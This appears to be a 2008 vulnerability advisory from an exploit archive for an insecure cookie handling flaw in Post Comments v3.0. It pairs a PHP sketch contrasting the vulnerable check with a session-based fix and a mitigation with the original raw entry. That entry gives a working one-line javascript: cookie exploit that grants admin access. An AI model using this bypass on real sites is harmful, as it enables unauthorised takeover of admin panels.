Vendor: Post Comments
By: Crackers_Child
CVSS: 7.5 (HIGH)
Insecure Cookie Handling
CWE: 614
Product Name: Post Comments
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:phpjabbers.com:post_comments:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Post Comments v3.0 Insecure Cookie Handling Vulnerability

Post Comments v3.0 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the PostCommentsAdmin cookie to 'logged' and setting the path to '/'. This will allow the attacker to gain access to the admin panel.

Mitigation:

Ensure that cookies are set with the 'secure' flag and that the 'httpOnly' flag is set to prevent access to the cookie from client-side scripts.
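
The following sketch is an added example, not the vendor's code: the function names and the shape of the cookie check are assumptions based on the description above. Cookie flags alone do not stop a visitor from writing a cookie in their own browser, so the hardened half keeps the admin state in a server-side session and uses the flags from the mitigation only to protect the session ID.

```php
<?php
declare(strict_types=1);
// Added illustration, not phpjabbers.com code; all function names are hypothetical.

// Vulnerable pattern (assumed from the description): the cookie value sent by
// the browser is the entire authentication state.
function is_admin_vulnerable(array $cookies): bool
{
    return ($cookies['PostCommentsAdmin'] ?? '') === 'logged';
}

// Hardened pattern: the cookie holds only a random session ID, issued with the
// flags named in the mitigation; call this at the top of every admin request.
function start_admin_session(): void
{
    session_set_cookie_params([
        'path' => '/', 'secure' => true, 'httponly' => true, 'samesite' => 'Strict',
    ]);
    session_start();
}

// $session is $_SESSION in a web request; passed in so the logic runs from the CLI.
function login(array &$session, string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true); // new ID at the privilege change
    }
    $session['is_admin'] = true;
    return true;
}

function is_admin_hardened(array $session): bool
{
    return ($session['is_admin'] ?? false) === true;
}

// Constructed demo values: a client-written cookie and a made-up password.
$clientCookies = ['PostCommentsAdmin' => 'logged'];
$session = [];
$hash = password_hash('constructed-demo-password', PASSWORD_DEFAULT);
var_dump(is_admin_vulnerable($clientCookies));
var_dump(is_admin_hardened($session));
login($session, 'wrong-guess', $hash);
var_dump(is_admin_hardened($session));
login($session, 'constructed-demo-password', $hash);
var_dump(is_admin_hardened($session));
```

Run from the PHP CLI, the cookie-only check accepts the client-written value, while the session-based check reports admin only after `login()` succeeds with the correct password.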

Exploit-DB raw data:

Post Comments v3.0 Insecure Cookie Handling Vulnerability
****************************
By Crackers_Child
****************************
Demo : http://www.phpjabbers.com/post-comment/try/admin.php

Vendor :   by phpjabbers.com

Exploit : javascript:document.cookie = "PostCommentsAdmin=logged; path=/";
****************************
Happy Eid al-Fitr to the whole Muslim world.
****************************

# milw0rm.com [2008-09-29]